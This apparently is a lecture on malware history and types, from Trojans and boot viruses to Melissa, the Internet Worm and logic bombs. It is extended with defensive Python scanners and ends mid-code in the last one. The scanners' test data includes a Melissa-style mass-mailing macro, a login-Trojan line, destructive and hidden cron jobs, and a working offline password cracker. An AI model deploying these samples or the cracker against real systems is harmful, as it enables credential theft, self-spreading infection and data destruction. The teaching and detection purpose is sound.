
Malicious Software Lesson 16

Upload: eleanor-higgins

Post on 17-Dec-2015


Malicious Software

Lesson 16

Malicious Software

• Trojan Horses
  – A program that appears to do one thing (and may indeed do it) but that hides something else.

• Viruses
  – A program that reproduces by attaching copies of itself to other programs; often carries a malicious "payload".

• Worms
  – Does not need to attach itself to another program to reproduce; attempts to gain access to other systems on a network and then copies itself to those new systems.

• Time (logic) bombs
  – A program that is set to execute its payload when a certain condition is met.

Trojan Horse

• Gets its name from the Trojan Horse of antiquity.

• Commonly found in programs that sound "interesting" so that people will run them.

• Requires that the program it is attached to is actually executed.

• Does not refer only to software
  – e.g. a Trojan ATM installed to collect card numbers and PINs.

• The earliest versions were probably login Trojans: a fake login prompt that records the password and then hands control to the real login.

Back Orifice & BO2K

• Originally released by cDc (the Cult of the Dead Cow) on 3 August 1998. It has reportedly been downloaded hundreds of thousands of times since then.

• It gives "system admin" type privileges to a remote user by way of the computer's Internet link.

• Back Orifice can arrive disguised as a component of practically any software installation. It can be attached to other files or programs or run on its own.

• To the user installing an "infected" application, it will appear that all went normally.

• For BO2K (Back Orifice 2000) see www.bo2k.com

Trojans: Detection and Prevention

• Often you won't know until something bad happens.

• Only run software you can trust.

• Install a virus checking program.

• Use a hashing/checksum type utility to periodically check the integrity of system routines.

• And don't forget Easter eggs (hidden, undocumented code that even legitimate vendors ship inside their programs).

Viruses

• MUST attach itself to another program.

• Usually contains a nefarious code segment which may not be immediately noticed.

• Three major types
  – program
  – boot
  – macro

[Slides: "Viruses World-wide" and "Some details about the virus" (figures not reproduced in the transcript)]

Viruses, some history

• Fred Cohen formalized the concept (as we know it today) as a Ph.D. student at USC in the early 1980s and published the formal definition in 1984 ("Computer Viruses: Theory and Experiments"); he later held a faculty post at Lehigh University.

• Apple II machines were the first (1982, the Elk Cloner program) to see what today would be called a virus, but it was benign.

• One of the first PC (DOS) viruses was discovered at Lehigh University in 1987 and was thus called the Lehigh virus.
  – A counter inside the virus was incremented by 1 on each infection.
  – When the counter reached four, the virus overwrote the FAT and boot sector with garbage, essentially destroying all data on the disk.
  – It infected COMMAND.COM (a .COM file), adding 555 bytes to it.
  – The author of the virus was never determined.

Viruses, some more history

• Next came the Brain virus (1986).
  – Probably written before the Lehigh virus but reported later.
  – The authors were not hard to find, because they included their names, address and a small commercial inside the virus.
  – Written in Pakistan (by two brothers in Lahore).
  – A floppy-only boot sector virus: only invoked if the machine was booted from an infected disk.
  – Wrote itself to six other sectors, then marked them as "bad" so DOS would not reuse them.
  – Changed the volume label to "(c)Brain", thus the name (Brain was the name of the company in the advertisement).
  – Used some stealth techniques: once resident, any request to read the boot sector was redirected to a copy of the original, so the disk showed no infection.
  – Carried no malicious payload, only the advertisement.
  – A variation was created to "punish" Americans involved in software piracy.

Viruses, the continuing saga...

• Up until 1987-1988 viruses were actually fairly rare. A couple of new viruses changed all of that.

• Jerusalem (aka Israel, Hebrew University, Friday the 13th, 1813, PLO)
  – First isolated at Hebrew University in Israel in 1987 (though some believe it actually originated somewhere in Italy).
  – A .COM and .EXE infector; added 1813 bytes to .COM files and 1808 to .EXE files.
  – Did not properly check for existing infection of .EXE files, so it kept reinfecting them, continually adding to their size: a tipoff that something was up.
  – Carried a payload which deleted any program run on Friday the 13th.
  – Spawned many copy-cat viruses.

• Stoned
  – Infected the master boot record (MBR) of a hard disk and the boot sector of a floppy disk.
  – Displayed the message "Your PC is now Stoned!"

• Michelangelo
  – Discovered in 1991.
  – Floppy diskette boot sector and hard disk partition/MBR infector (details below).

Viruses, more on Michelangelo

Michelangelo is a floppy diskette boot sector and hard disk partition/MBR infector, and became fairly widespread after being discovered in April 1991. It is potentially destructive, since variants will destroy data on the hard disk, and on floppies, on March 6 as well as other dates.

If an infected diskette is in the A: drive at boot-up, its boot sector (sector 0), which contains the virus program, is read into memory. The virus then takes control of the system and infects the hard disk when boot-up completes, copying its code to (cylinder 0, head 0, sector 1) and moving the original partition/MBR data to (cylinder 0, head 0, sector 7).

Ordinarily no data are lost from the hard disk by that alone, because DOS does not use the sector the virus uses. However, if that sector is used by third-party software to store data, during formatting, for password access, or by drivers to access large partitions, problems can result.

In its original form Michelangelo was 480 bytes long, would not infect disks in the B: drive, and lowered the memory size returned by Interrupt 12h by 2 KB, denying DOS the use of memory between 638K and 640K, where the virus is resident. Thus CHKDSK will show 653,312 total bytes of memory instead of 655,360.

The virus hooks Interrupt 13h, and any DOS use of it to read or write (even the DIR command) triggers the virus to infect the disk in A:, if it is not already infected or write-protected.

It moves the diskette's original boot record code to the area used by the root directory, and if the disk has files listed in the overwritten sector, this causes the loss of the entries for files, deleted files and sub-directories in the root.

The files could still be located in the file storage area of the disk and recovered with a utility program, but since they are no longer listed in the directory they may be overwritten as other files are later stored on the diskette.

For its destructive phase, the virus checks the system date only when the PC is booted from an infected disk. (It thus can never activate on an XT, which boots with the 01-01-80 date.) If the date matches the one a particular variant uses, it causes data loss.

If it is thus triggered, Michelangelo begins overwriting at the start of the disk (where the partition table/MBR, boot sector, File Allocation Tables and directory data are stored). After the user realizes that something is wrong, turns the power off and re-boots from a floppy, trying to access the hard disk results only in the message "Invalid Drive Specification". At that point, exactly how much data were lost depends on how long it took to turn the power off. If the power is turned off quickly enough, the virus can be prevented from completing its job. Files located beyond the point at which the overwriting stopped (especially on D: or E: drives, if they existed) would still remain.

Program viruses

• Contaminate files that contain executable code, especially .EXE and .COM files but also .SYS and .DLL files.

• About 85% of viruses (at one time) were program viruses.

Boot Viruses

• Computer operating systems typically set aside a portion of each disk for the code that boots the computer. Under DOS, this is the boot sector of a floppy; a hard disk has a master boot record (MBR) in its first sector, and each partition has its own boot sector.

• Boot viruses (or system infectors) store themselves in this area and hence are invoked whenever the disk is used to boot the system, before the operating system is loaded.
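The checks a boot-sector scanner performs follow directly from the MBR layout above and from the Michelangelo description: validate the 0x55AA signature, hash the 446 bytes of boot code against a baseline taken while the disk was known clean, and look in the rest of track 0 (which DOS leaves unused) for a relocated copy of the original MBR. The following is an added example, not code from the lecture. Both "disk images" are constructed in memory with fake boot code; the infected one is laid out as the text says Michelangelo does it (virus in CHS sector 1, original MBR parked in CHS sector 7).

```python
"""Boot-sector integrity check: parse a 512-byte MBR, validate the boot
signature and partition table, compare the boot code against a known-good
hash, and look for a relocated copy of the original MBR in the unused
sectors of track 0.

Added example, not from the lecture.  Both "disk images" are constructed in
memory: a clean one, and one laid out the way the Michelangelo description
above says that virus does it (virus code in cylinder 0 / head 0 / sector 1,
the original MBR copied to sector 7).  No real boot code is used."""
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 446              # bytes 0..445: boot code
PART_TABLE_OFF = 446             # bytes 446..509: 4 entries x 16 bytes
SIGNATURE = b"\x55\xAA"          # bytes 510..511
PART_ENTRY = "<B3xB3xII"         # boot flag, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Split an MBR sector into boot code (hashed), partition entries and signature."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    parts = []
    for i in range(4):
        boot_flag, ptype, lba_start, count = struct.unpack_from(
            PART_ENTRY, sector, PART_TABLE_OFF + 16 * i)
        if ptype != 0:           # type 0 = empty slot
            parts.append({"bootable": boot_flag == 0x80, "type": ptype,
                          "lba_start": lba_start, "sectors": count})
    code = sector[:BOOT_CODE_LEN]
    return {"boot_code_sha256": hashlib.sha256(code).hexdigest(),
            "partitions": parts,
            "signature_ok": sector[510:512] == SIGNATURE}


def scan_disk(image: bytes, baseline_sha256: str) -> list:
    """Findings for a raw disk image: bad signature, boot code that no longer
    matches the baseline, and any other sector of track 0 that holds a valid
    MBR with the same partition table (a relocated original).  CHS sector
    numbers start at 1, so the report's "sector 7" is LBA 6."""
    findings = []
    mbr = parse_mbr(image[:SECTOR])
    if not mbr["signature_ok"]:
        findings.append("sector 0: missing 0x55AA boot signature")
    if mbr["boot_code_sha256"] != baseline_sha256:
        findings.append("sector 0: boot code differs from baseline")
    for lba in range(1, min(63, len(image) // SECTOR)):   # rest of track 0, unused by DOS
        sec = image[lba * SECTOR:(lba + 1) * SECTOR]
        if sec[510:512] != SIGNATURE:
            continue
        other = parse_mbr(sec)
        if other["partitions"] == mbr["partitions"] and \
                other["boot_code_sha256"] == baseline_sha256:
            findings.append(f"LBA {lba} (CHS sector {lba + 1}): copy of the original MBR")
    return findings


def build_mbr(boot_code: bytes, partitions: list) -> bytes:
    """Assemble an MBR from boot code and (type, lba_start, sectors) tuples."""
    sector = bytearray(boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN])
    table = bytearray(64)
    for i, (ptype, lba_start, count) in enumerate(partitions):
        struct.pack_into(PART_ENTRY, table, 16 * i,
                         0x80 if i == 0 else 0x00, ptype, lba_start, count)
    return bytes(sector + table + SIGNATURE)


# Constructed sample data: a fake loader and one FAT16 partition starting at LBA 63
CLEAN_BOOT_CODE = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"CLEAN-LOADER"
PARTITIONS = [(0x06, 63, 2_000_000)]
CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, PARTITIONS)
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]   # recorded while the disk was known clean


def clean_image() -> bytes:
    return CLEAN_MBR + b"\x00" * (SECTOR * 62)


def infected_image() -> bytes:
    """Michelangelo-style layout: the infector keeps the partition table in
    sector 0 so DOS still boots, and parks the original MBR at CHS sector 7."""
    sectors = [build_mbr(b"VIRUS-CODE-GOES-RESIDENT-THEN-CHAINS", PARTITIONS)]
    sectors += [b"\x00" * SECTOR] * 62
    sectors[6] = CLEAN_MBR                                 # CHS sector 7 == LBA 6
    return b"".join(sectors)


if __name__ == "__main__":
    for name, image in (("clean", clean_image()), ("infected", infected_image())):
        print(name, scan_disk(image, BASELINE) or ["no findings"])
```

The relocation check is the interesting one: a stealth boot virus keeps the partition table intact in sector 0 so the machine still boots, which is exactly why a matching table plus the baseline boot-code hash turning up a few sectors later is a strong signal rather than a coincidence. On a real disk the same logic runs over the first track read with `dd` or a raw device handle; the 2 KB discrepancy in the memory size reported by Interrupt 12h is the complementary check for a resident copy.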

Macro Viruses

• Manifested as an auto-executing macro (e.g. AutoOpen) embedded in the document files of applications with a macro capability, e.g. word processors and spreadsheets.

• The first one detected was the Concept virus, which infected Microsoft Word document files. Detected in July 1995; by the fall it was the most frequently reported virus.

• Since the Concept virus, numerous macro viruses have been created.

Macro Viruses, some examples

• FormatC (1997): deleted files on the hard disk.

• Wazzu (1997): randomly moved up to 3 words in a document, or else inserted the word "Wazzu".

• WM/PolyPoster (1998): tried to post the user's Word documents to public newsgroups such as alt.hacker, alt.2600 and alt.sex.

• ShareFun (1998): infected the global template so all documents would be infected, then 1 time out of 4 tried to send an infected file to three random email addresses from the user's mail list.

Macro viruses: Melissa

• Infects Word 97 and Word 2000 on Windows-based machines (Windows 95, Windows 98 and Windows NT).

• Spread by means of a specially crafted e-mail message from someone who has been infected.
  – The subject line reads: "Important Message From <name of infected user>"
  – The body contains the line: "Here is that document you asked for ... don't show anyone else ;-)"
  – It carries an attachment named LIST.DOC, which is an infected Word document.

Melissa (cont.)

• Each time an infected document is opened, the virus:
  – lowers the macro security settings (Tools-Macro in Word 97 or Macro-Security in Word 2000) so that macros run automatically, without warnings, whenever documents are opened in the future;
  – checks whether the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? has the value "... by Kwyjibo";
  – if it does not, or the key does not exist, looks for an installed copy of Microsoft Outlook (not Outlook Express) and uses it to send copies of itself in the name of the infected user to up to 50 addresses in every Outlook address book available to the user;
  – attaches itself to the NORMAL.DOT default template, thereby propagating to arbitrary Word documents as they are opened.

• Carries a secondary (non-destructive) payload, triggered when a document is opened or closed at a moment when the current minute matches the current day of the month (e.g. at 11:29 on March 29th). If so, the following text is inserted in the document:
  – "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
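The traits listed for Concept and Melissa (an auto-executing entry point, tampering with macro security, a registry marker, Outlook automation to mass-mail, writing into the global template) are all visible in the macro source, which is what static triage of a document keys on. The scanner below is an added example, not code from the lecture and not Melissa's code; the VBA text it runs on is constructed to show the same family of behaviours with generic names. It assumes the macro source has already been extracted from the .doc (a tool such as olevba from oletools does that), so the function takes the source as a string.

```python
"""Static triage of VBA macro source for the traits the Concept and Melissa
descriptions above share: an auto-executing entry point, tampering with
macro security, a registry marker, mass mailing via Outlook automation,
and writing into the global template.

Added example, not from the lecture and not Melissa's code.  The macro text
below is constructed; extraction of the VBA from a real .doc (e.g. with
oletools' olevba) is assumed to have happened already."""
import re
from dataclasses import dataclass, field

# Procedure names Word/Excel run without the user asking
AUTO_EXEC = {"autoopen", "autoclose", "autoexec", "autonew", "autoexit",
             "document_open", "document_close", "document_new",
             "workbook_open", "workbook_activate"}

# (tag, pattern): each pattern catches one behaviour worth a closer look
SUSPICIOUS = [
    ("macro-security-tamper",
     re.compile(r'(?i)Options\.VirusProtection\s*=\s*False|\\Security\\Level|CommandBars\("Macro"\)')),
    ("registry-access",
     re.compile(r"(?i)PrivateProfileString\s*\(.*HKEY_|\bRegWrite\b|\bRegRead\b")),
    ("outlook-automation",
     re.compile(r'(?i)(CreateObject|GetObject)\s*\(\s*"Outlook\.Application"')),
    ("mass-mail",
     re.compile(r"(?i)\.AddressLists|\.Recipients\.Add|\.Send\b")),
    ("global-template-write",
     re.compile(r"(?i)NormalTemplate\.VBProject|\.CodeModule\.(AddFromString|InsertLines)|\.VBComponents\.Import")),
]

SUB_DECL = re.compile(r"(?im)^\s*(?:private\s+|public\s+)?(?:sub|function)\s+(\w+)")


@dataclass
class MacroReport:
    auto_exec: list = field(default_factory=list)   # auto-run procedures found
    behaviours: list = field(default_factory=list)  # matched SUSPICIOUS tags

    @property
    def verdict(self) -> str:
        """Auto-run plus two or more behaviours is the classic macro-virus shape."""
        if self.auto_exec and len(self.behaviours) >= 2:
            return "likely-malicious"
        if self.auto_exec or self.behaviours:
            return "suspicious"
        return "clean"


def scan_vba(source: str) -> MacroReport:
    report = MacroReport()
    for name in SUB_DECL.findall(source):
        if name.lower() in AUTO_EXEC:
            report.auto_exec.append(name)
    for tag, pattern in SUSPICIOUS:
        if pattern.search(source):
            report.behaviours.append(tag)
    return report


# Constructed sample: the behaviour pattern described above, with made-up names
SAMPLE_MALICIOUS = r'''
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Marker?") <> "set" Then
        Set app = CreateObject("Outlook.Application")
        Set ns = app.GetNameSpace("MAPI")
        For Each book In ns.AddressLists
            Set msg = app.CreateItem(0)
            For i = 1 To 50
                msg.Recipients.Add book.AddressEntries(i)
            Next i
            msg.Subject = "Important Message From " & Application.UserName
            msg.Attachments.Add ActiveDocument.FullName
            msg.Send
        Next book
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Marker?") = "set"
    End If
    NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 30)
End Sub
'''

# Constructed sample: an ordinary formatting macro
SAMPLE_BENIGN = r'''
Sub FormatReport()
    Selection.Font.Bold = True
    ActiveDocument.Save
End Sub
'''

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        r = scan_vba(src)
        print(f"{label}: {r.verdict} auto_exec={r.auto_exec} behaviours={r.behaviours}")
```

The verdict deliberately requires an auto-run entry point together with more than one behaviour: a single `.Send` in a macro that a user invokes on purpose is normal office automation, while `Document_Open` that also silences the macro warning and touches NORMAL.DOT is the signature the page describes.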

Virus Characteristics

• Stealth
  – All viruses, to some degree, attempt to conceal their presence in order to maximize their chance of spreading.

• Polymorphism
  – Viruses that attach an evolved (mutated or re-encrypted) copy of themselves to the new host instead of an exact copy, so that no fixed byte pattern identifies every copy.
  – They "morph".

Detection of and Protection against Viruses

• Usually you won't know until something bad happens.

• Don't run programs you can't trust.
  – Shrinkwrap is not always a guarantee.

• Install a virus checking program.
  – Update it frequently.

• Backup, backup, backup.

Anti-Virus packages

Virus hoaxes

Worms

• "Program that propagates from one computer to another over a network by breaking into the computers in much the way that a hacker would break into them." To do this they
  – need to find a machine,
  – break into it, and
  – make a copy of themselves on the new machine.

• Like viruses, may or may not contain a destructive payload.

• Hybrid viruses/worms now exist.

The Internet Worm (November 1988)

• Took advantage of flaws in standard UNIX software:
  – fingerd: a buffer overflow in its use of gets()
  – sendmail: a bug in the DEBUG option that allowed remote command execution
  – password guessing: anybody could read the encrypted password file (/etc/passwd), so the worm could test guesses offline with crypt()

• Also simply attempted to take advantage of trusted host relationships (.rhosts / hosts.equiv) using rsh.

The Internet Worm

• Two parts
  – Main program
    • collected information on other systems on the network
    • attempted penetration of these systems in order to send over the bootstrap program
  – Bootstrap program
    • small (99-line) C program
    • would attempt to copy the main worm onto the system and run it

• Made some attempts to hide itself
  – would delete its own files as soon as it was running
  – if a failure occurred, it deleted itself

[Slide: "The dictionary used by the Worm" (word list not reproduced in the transcript)]
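The password-guessing stage described above (and the dictionary slide) rests on one fact: the hashes were in a world-readable /etc/passwd, so every guess could be checked offline without ever talking to the login program. The following is an added example, not the lecture's or the worm's code, that models that stage: per account it tries the cheap guesses first (no password, the login name and simple permutations of it, words from the GECOS field) and only then a word list, and it skips accounts whose hash has been moved to a shadow file. Everything is constructed: the password lines are invented, the word list is a small stand-in in the style of the worm's built-in one, and the 1988 DES crypt(3) is replaced by salted PBKDF2-SHA256 from hashlib so the code runs on a current Python (the `crypt` module is gone in 3.13).

```python
"""Offline dictionary attack against a world-readable password file, the way
the Internet Worm's password-guessing stage worked: per account, try the
cheap guesses first (no password, the login name and permutations of it,
words from the GECOS field), then an internal word list.

Added example, not from the lecture and not the worm's code.  Constructed
data throughout: the passwd lines are made up, and DES crypt(3) is replaced
by salted PBKDF2-SHA256 from hashlib.  The word list is a tiny stand-in."""
import hashlib
import re

ROUNDS = 1000   # kept low so the demonstration is quick; real KDFs use far more


def hash_password(password: str, salt: str) -> str:
    """Stand-in for crypt(3): salted, iterated hash, hex-encoded."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ROUNDS).hex()


def make_entry(user: str, password: str, salt: str, gecos: str) -> str:
    """Build a classic 7-field passwd line with the hash in field 2 (no shadow file)."""
    return f"{user}:{salt}${hash_password(password, salt)}:1000:1000:{gecos}:/home/{user}:/bin/sh"


def candidate_passwords(user: str, gecos: str, wordlist):
    """Yield guesses in the worm's order: trivial, name-derived, GECOS-derived, dictionary."""
    seen = set()

    def emit(word):
        if word not in seen:
            seen.add(word)
            yield word

    for w in ("", user, user[::-1], user + user, user.capitalize()):
        yield from emit(w)
    for w in re.split(r"[ ,]+", gecos):      # full name, room, phone fields
        yield from emit(w)
        yield from emit(w.lower())
    for w in wordlist:
        yield from emit(w)
        yield from emit(w.capitalize())


def crack_passwd(lines, wordlist) -> dict:
    """Return {user: (password, guesses_needed)} for each account whose hash is
    readable and falls to a guess.  Shadowed accounts ('x', '*', '!') are skipped:
    with nothing to compare against, offline guessing has nothing to work on."""
    results = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        user, field2, _uid, _gid, gecos, _home, _shell = line.split(":")
        if field2 in ("x", "*", "!"):
            continue
        salt, digest = field2.split("$", 1)
        for n, guess in enumerate(candidate_passwords(user, gecos, wordlist), 1):
            if hash_password(guess, salt) == digest:
                results[user] = (guess, n)
                break
    return results


# Constructed stand-in for the worm's dictionary (the real one had ~430 words)
WORDLIST = ["aaa", "academia", "aerobics", "airplane", "albany", "albatross",
            "albert", "alex", "alexander", "algebra", "aliases", "alphabet"]

# Constructed accounts; none of these are real people or real hashes
PASSWD_LINES = [
    make_entry("rtm", "", "Qa", "Robert Test"),                 # empty password
    make_entry("ldk", "kdl", "Zx", "Lazy Dee Key"),              # login name reversed
    make_entry("jsmith", "Smith", "8f", "John Smith,Rm 101"),    # word from GECOS
    make_entry("alice", "albatross", "K9", "Alice Example"),     # dictionary word
    "bob:x:1004:1004:Bob Shadowed:/home/bob:/bin/sh",            # hash lives in /etc/shadow
    make_entry("carol", "Tr0ub4dor&3", "Lm", "Carol Strong"),    # survives this list
]

if __name__ == "__main__":
    for user, (pw, n) in crack_passwd(PASSWD_LINES, WORDLIST).items():
        print(f"{user}: {pw!r} after {n} guesses")
```

Two things the run makes concrete: most accounts fall within a handful of guesses before the dictionary is even reached, which is why the ordering mattered more than the size of the list; and the only accounts that are safe are the one with a real password and the one whose hash is not in the readable file at all, which is the argument for shadow passwords (and, today, for slow salted KDFs that make each guess expensive).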

Why did it cause so much damage?

• There was no damaging payload.
  – Systems had problems simply because there were too many copies of the worm running on them.
  – There was a check to see whether a system was already infected, but 1 out of every 7 times it ignored this check.
  – Copies of the worm marked for deletion still made one pass through the password file.

The fate of RTM

• Robert T. Morris, the author of the Internet Worm program, was convicted of a Federal felony in the case. The law involved was 18 U.S.C. § 1030(a)(5)(A), the Computer Fraud and Abuse Act of 1986. He was found guilty in January 1990 in US District Court in Syracuse, NY.

• In May 1990 he was sentenced -- outside the Federal sentencing guidelines -- to 3 years of probation, 400 hours of community service, and $10,050 in fines plus probation costs. His lawyers appealed the conviction to the Circuit Court of Appeals, and the conviction was upheld. They then appealed to the Supreme Court, but the Court declined to hear the case, leaving the conviction intact.

Hybrid viruses/worms

• CHRISTMA EXEC
  – December 1987; written by a German university student as a REXX script for IBM VM/CMS mainframes.
  – Spread via email messages.
  – When the email message was read, the recipient was told to type CHRISTMAS, which started a program that displayed a Christmas tree
  – and then searched for the e-mail addresses of other users who had sent mail to or received mail from the user, and mailed a copy to each of them.
  – Spread to 130 countries; was not intended to do any harm.
  – Called a worm because it does not attach itself to another program (it still needed a human to run it, which is what makes it a hybrid).

Hybrid viruses/worms: PrettyPark

• Runs on Windows 9x/NT.

• Arrives via email from infected users with the subject "C:\CoolProgs\Pretty Park.exe" and the body text "Test: Pretty Park.exe :)". May display an icon of a character from the animated comedy series "South Park".

• Attached is a program named Pretty Park.exe or Pretty~1.exe, which contains the worm's payload.

• When a user opens this program, the worm runs itself as a hidden application in Windows, copies itself to the Windows System directory as FILES32.VXD, and registers that program to run each time another application starts. Then it mails itself every 30 minutes to each address in the user's address book, using either Outlook or Outlook Express.

• A second function is to connect to an IRC server and join a specific IRC channel. While connected, the worm tries to stay connected by sending information to the IRC server, and will also retrieve any commands from the IRC channel. Through that channel the author could use the worm as a remote access trojan to obtain information such as the computer name, registered owner, registered organization, system root path, and Dial-Up Networking usernames and passwords.

Worms: Detection and Prevention

• For hybrid ones arriving in email, don't run a program unless you are sure of its source and integrity. If in doubt:
  – contact the sender;
  – download it to a disk and run it on an isolated system first.

• For network worms, protection takes the same form as protecting the network: install patches and secure the system the same way you would to keep human intruders out.

• Often you will not detect a worm until after a problem.
  – You may want to periodically check and routinely monitor system files, especially for any attempts to modify them.
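Both the Trojan section ("use a hashing/checksum type utility to periodically check the integrity of system routines") and the bullet just above (routinely monitor system files for attempts to modify them) describe the same control: record a baseline of digests for the programs you care about, re-check on a schedule, and report anything added, removed or changed. The following is an added example, not code from the lecture. It runs over any directory tree you point it at; the scenario function builds a throwaway tree with a couple of fake "system routines", one of which is trojaned (and made setuid) between the two runs.

```python
"""Host file-integrity checking: record SHA-256 digests (plus size and
permission bits) of the files under a root, then re-check and report what
was added, removed or changed.  This is the checksum utility the Trojan
section calls for and the routine monitoring of system files the worm
section calls for.

Added example, not from the lecture.  The scenario constructs a temporary
tree with fake 'system routines' and then trojans one of them."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    """Digest, size and mode of one file.  Mode matters too: a binary that
    quietly became setuid is as interesting as one whose contents changed."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = path.stat()
    return {"sha256": h.hexdigest(), "size": st.st_size,
            "mode": oct(stat.S_IMODE(st.st_mode))}


def build_baseline(root: Path) -> dict:
    """Fingerprint every regular file under root (symlinks skipped), keyed by
    POSIX-style relative path so the baseline is portable."""
    base = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            base[p.relative_to(root).as_posix()] = fingerprint(p)
    return base


def save_baseline(base: dict, out: Path) -> None:
    # keep the baseline OUTSIDE the tree it describes, ideally on read-only media
    out.write_text(json.dumps(base, indent=1, sort_keys=True))


def load_baseline(path: Path) -> dict:
    return json.loads(path.read_text())


def compare(baseline: dict, current: dict) -> dict:
    """{'added': [...], 'removed': [...], 'changed': {path: [fields that differ]}}"""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in sorted(set(baseline) & set(current)):
        diff = [k for k in ("sha256", "size", "mode") if baseline[rel][k] != current[rel][k]]
        if diff:
            changed[rel] = diff
    return {"added": added, "removed": removed, "changed": changed}


def demo(root: Path, baseline_file: Path) -> dict:
    """Constructed scenario: baseline a tree, trojan one program and drop a new
    file, then report what the re-check sees."""
    bin_dir = root / "bin"
    bin_dir.mkdir(parents=True, exist_ok=True)
    (bin_dir / "login").write_bytes(b"#!/bin/sh\nexec /sbin/real-login \"$@\"\n")
    (bin_dir / "ls").write_bytes(b"\x7fELF fake ls\n")
    os.chmod(bin_dir / "login", 0o755)
    save_baseline(build_baseline(root), baseline_file)

    # a 'login Trojan': records what it is given, then hands over to the real program
    (bin_dir / "login").write_bytes(
        b"#!/bin/sh\nprintf '%s\\n' \"$@\" >> /tmp/.pw; exec /sbin/real-login \"$@\"\n")
    os.chmod(bin_dir / "login", 0o4755)              # and it went setuid
    (bin_dir / "bo.exe").write_bytes(b"dropped")     # a new file appeared

    return compare(load_baseline(baseline_file), build_baseline(root))


def run_demo() -> dict:
    """Run the scenario in a throwaway directory and return the comparison."""
    with tempfile.TemporaryDirectory() as tmp:
        return demo(Path(tmp) / "tree", Path(tmp) / "baseline.json")


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=1))
```

The usual caveats apply when this is run for real: the baseline must be taken on a system you trust, stored where the attacker cannot rewrite it, and compared by a tool that was itself checked, otherwise a Trojaned checker reports whatever it likes. Size and mode are recorded alongside the digest because a mode change alone (0755 to 4755 above) never shows up in a hash.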

Time/Logic Bombs

• Can be a Trojan or a stand-alone program.

• Designed to invoke its payload when a certain condition is met.
  – Time bomb: at a specific time/date.
  – Logic bomb: when a certain condition becomes true.

• Timothy Lloyd and Omega Engineering (1996)
  – About three weeks after his dismissal, a logic bomb deleted all of Omega's design and production programs; tens of millions of dollars lost.

• USPA/IRA
  – After an employee was fired, 186,000 client records were deleted.

Time/Logic Bombs: Prevention and Detection

• Often very hard to detect until too late (i.e. until after it has activated).

• Will generally be the work of an insider.
  – This means they have access that will complicate finding this type of malicious software.

• Check programs set to always run or to run at startup.

• Prosecute if it happens.
  – Won't save you, but may discourage the next individual from trying it.

• Backup, backup, backup.
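"Check programs set to always run or to run at startup" is the one actionable item above, and on a Unix host that means the cron tables and boot-time jobs. A time bomb planted in cron has a recognisable shape: a schedule that names a single calendar date, a command that destroys data, or a program living in a temporary or hidden directory. The following is an added example, not code from the lecture; the crontab text is constructed (the planted job fires on 31 July, the date of the Omega incident), and on a real host the same function would be fed `crontab -l` output for each user and the files under /etc/cron.d.

```python
"""Triage of cron and boot-time jobs for time-bomb and logic-bomb traits,
following the "check programs set to always run or run at startup" advice:
a job that fires on one exact calendar date, carries a destructive command,
or runs from a temporary or hidden path is worth a look.

Added example, not from the lecture.  The crontab is constructed; for real
use, feed it 'crontab -l' output per user and the files in /etc/cron.d."""
import re
from dataclasses import dataclass

DESTRUCTIVE = re.compile(
    r"(?i)\brm\s+(-[a-z]*r|--recursive)|\bdd\s+.*\bof=/dev/|\bmkfs|\bshred\b|\bformat\b"
    r"|\bdrop\s+table\b|\bdelete\s+from\b")
ODD_LOCATION = re.compile(r"/tmp/|/dev/shm/|/var/tmp/|/\.[\w-]+/")   # temp dirs, dot-directories


@dataclass
class Finding:
    line: str
    reasons: list


def _is_single_date(dom: str, month: str, dow: str) -> bool:
    """True when day-of-month and month are both fixed numbers and day-of-week
    is unrestricted: a once-a-year trigger, the usual look of a time bomb."""
    return dom.isdigit() and month.isdigit() and dow == "*"


def scan_crontab(text: str) -> list:
    """Return a Finding for every job with at least one suspicious trait."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                          # blank, comment, or VAR=value
        if line.startswith("@"):              # @reboot, @daily, ...
            sched, cmd = line.split(None, 1)
            fields = None
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            fields, cmd = parts[:5], parts[5]
            sched = " ".join(fields)
        reasons = []
        if sched == "@reboot":
            reasons.append("runs at every boot")
        if fields and _is_single_date(fields[2], fields[3], fields[4]):
            reasons.append(f"fires on one calendar date ({fields[3]}/{fields[2]})")
        if DESTRUCTIVE.search(cmd):
            reasons.append("destructive command")
        if ODD_LOCATION.search(cmd):
            reasons.append("runs from a temporary or hidden path")
        if reasons:
            findings.append(Finding(line, reasons))
    return findings


# Constructed crontab: a normal host plus two planted jobs
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
MAILTO=root
0 3 * * *  /usr/local/bin/backup --full
*/5 * * * * /usr/lib/monitor/check-disk
@daily      /usr/sbin/logrotate /etc/logrotate.conf
30 2 31 7 * /opt/eng/.cleanup/purge.sh && rm -rf /srv/design /srv/production
@reboot     /tmp/.x/agent --quiet
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
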